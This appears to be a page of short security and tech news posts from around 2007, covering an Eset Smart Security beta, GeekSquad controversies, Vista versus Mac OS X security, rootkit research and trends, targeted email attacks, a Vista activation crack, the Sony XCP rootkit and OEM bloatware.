Landlord, one of our Geeks in Training has done a mini-review of Eset’s new Smart Security Suite now in beta. Smart Suite adds a firewall and anti-spam function to the NOD32 anti-virus scanner.

I’ve just downloaded the new Eset Smart Security Beta to check it out, and see if Eset continue their tradition of low-memory consuming products. It offers anti-virus protection with the successful NOD32 engine along with a firewall and anti-spam protection. I haven’t checked its detection rates and success, but seeing as it’s based on the excellent NOD32 engine I know what to expect from it.

I’ve got a very good first impression: the interface is much better than it was in the original anti-virus product, which was very confusing and unfriendly. The new interface is uncluttered and better suited to the current Vista look.

Read the rest of this entry »

GeekSquad, the well marketed, much advertised, but seldom recommended tech support team at BestBuy is no stranger to bad publicity. A GeekSquad agent was recently caught video taping a client in the shower. Prior to that they were sued for using unlicensed software by Winternals.

Now it seems current and former agents are joining the chorus. GeekSquadSecrets.com (registration required) has some interesting information. For example, a new “agent”, Johnny Utah. He’s not an agent at all, but is simply a remote connection to techs in The Philippines and Malaysia. Plunk down $199 to have a virus or other malware removed, only to have the tech connect it to a remote connection, walk away and then collect your money?

Read the rest of this entry »

Dino Dai Zovi, the New York-based security researcher who took home $10,000 in a highly-publicized MacBook Pro hijack on April 20, has stated in an interview that he thinks Vista is more secure than OSX.

From your research on both platforms, is there a winner between Mac OS X 10.4 and Vista on security?

I have found the code quality, at least in terms of security, to be much better overall in Vista than Mac OS X 10.4. It is obvious from observing affected components in security patches that Microsoft’s Security Development Lifecycle (SDL) has resulted in fewer vulnerabilities in newly-written code. I hope that more software vendors follow their lead in developing proactive software security development methodologies.

Contest winner: Vista more secure than Mac OS [MacWorld]

Respected security researcher Joanna Rutkowska promises to reveal new rootkit techniques for Vista, and ways to defeat it’s BitLocker drive encryption. On her blog she notes there will be a training session for “legitimate companies” during the Black Hat Briefings in Las Vegas, in late July.

As the training will be focused on Windows platform and Vista x64 specifically, we will also present some new kernel attacks against latest Vista x64 builds. These attacks, of course, work on the fly and do not require system reboot and are not afraid of the TPM/Bitlocker protection. (Although they could also be used to bypass Vista DRM protection, this subject will not be discussed during the training)

Understanding Stealth Malware [invisiblethings]

Increasingly the actual code, often JavaScript, used to attack PCs is hidden in Flash animations or scrambled so that anyone who examines the source of a page can’t easily identify it, said Jose Nazario, a senior software engineer at Arbor Networks, in a presentation at the CanSecWest security confab here.

“Their obfuscation tools are primitive but effective,” Nazario said. “They use obfuscation to avoid simple signatures,” he said, referring to security techniques based on signatures to detect malicious Web sites. Signatures are fingerprints of known attacks.

Web attacks have become commonplace. Tens of thousands of Web sites attempt to install malicious code, according to StopBadware.org. The sites, the bulk of which are compromised sites, often drop a Trojan horse or other pest onto a PC through a security hole in the Web browser.

View: Full Story @ News.com

Rootkits–malicious software that operates in a stealth fashion by hiding its files, processes and registry keys–have grown over the past five years from 27 components to 2,400, according to McAfee’s Rootkits Part 2: A Technical Primer (PDF).

“The trend is it used to be rootkit A was used, but now it’s different components in different rootkit malware,” said Dave Marcus, security researcher and communications manager for McAfee Avert Labs. “Now, there are more ways attackers can use these components to hide their malware.”

Attackers use rootkits to hide their malicious software, which can range from spyware to keylogger software that can steal sensitive information from users’ computers. The rootkits can then be used to create a hidden directory or folder designed to keep it out of view from a user’s operating system and security software.

View: Full Story @ News.com

During March, MessageLabs intercepted 716 e-mail messages that were part of 249 targeted attacks aimed at 216 of its customers, the Gloucester, England-based provider of hosted e-mail filtering services said in a research report. Of the attacks, almost 200 consisted of a single malicious e-mail designed to infiltrate an organization, MessageLabs said.

“These numbers represent a significant increase when compared to the same period last year when attack rates reached one or two per day,” MessageLabs said.

Security experts have said that limited-scale attacks are the most dangerous. Widespread worms, viruses or Trojan horses sent to millions of mailboxes are typically not a grave concern because they can be blocked. But targeted Trojan horses, especially those aimed at specific businesses, have become nightmares as they can fly under the radar.

View: Full Story @ news.com

A genuine crack for Windows Vista has just been released by pirate group Pantheon, which allows a pirated, non-activated installation of Vista (Home Basic/Premium and Ultimate) to be properly activated and made fully-operational.

Unlike cracks which have been floating around since Vista RTM was released in late November, this crack doesn’t simply get around product activation with beta activation files or timestop cracks – it actually makes use of the activation process. It seems that Microsoft has allowed large OEMs like ASUS to ship their products with a pre-installed version of Vista that doesn’t require product activation – apparently because end users would find it too inconvenient.

This version of Vista uses System-Locked Pre-Installation 2.0 (SLP 2.0). It allows the “Royalty OEMs” to embed specific licensing information into the operating system which Vista can activate without having to go back to Microsoft for verification. The licensing components include the OEM’s hardware-embedded BIOS ACPI_SLIC (which has been signed by Microsoft), an XML certificate file which corresponds to this ACPI_SLIC and a specific OEM product key.

View: Full Story @ apcmag.com

In October 2005, Windows expert Mark Russinovich broke the news about a truly underhanded copy-protection technology that had gone horribly wrong. Certain Sony Music CDs came with a program that silently loaded itself onto your PC when you inserted the disc into a CD-ROM drive. Extended Copy Protection (or XCP, as it was called) stymied attempts to rip the disc by injecting a rootkit into Windows — but had a nasty tendency to destabilize the computer it shoehorned itself into. It also wasn’t completely invisible: Russinovich’s own RootkitRevealer turned it up in short order. Before long, Sony had a whole omelette’s worth of egg on its face, and the word rootkit had entered the vocabulary of millions of PC users.

The concept of the rootkit isn’t a new one, and dates back to the days of Unix. An intruder could use a kit of common Unix tools, recompiled to allow an intruder to have administrative or root access without leaving traces behind. Rootkits, as we’ve come to know them today, are programs designed to conceal themselves from both the operating system and the user — usually by performing end-runs around common system APIs. It’s possible for a legitimate program to do this, but the term rootkit typically applies to something that does so with hostile intent as a prelude toward stealing information, such as bank account numbers or passwords, or causing other kinds of havoc.

View: Full Story Via: EETimes

Earlier today Slashdot pointed me to a CBC article citing unnamed sources at Microsoft decrying the state of “craplets” on PCs. Just what are craplets? It’s a cute nickname for all of the software an OEM installs on your new Windows PC before it arrives on your doorstep. Think: 2 or 3 ISP sign-up applications, instant messengers out the wazoo, and software for updating all of this software. And a lot more. Check out the CBC article for more basic details on what craplets are and why they make people, including Microsoft, angry.

Why do we get craplets on our machines? The answer, as you probably could already guess, is that OEMs make money from crapware (a collective term for all craplets). Companies like RealNetworks or JASC Software will pay to have their applications (say, PaintShop Pro) pre-installed on a PC. It’s even more lucrative, sources tell us, when these applications can be established as default handlers for as many file types as possible. It’s advertising, OEM-style.

This is also partially how Microsoft got into trouble back in the days of Netscape vs. IE. Telling OEMs what to do turned out not to be as kosher as Microsoft thought, and they got a hand upside the head for it. Microsoft now complains that this puts them in the position of not being able to do anything about crapware.

View: Full Story Via: ArsTechnia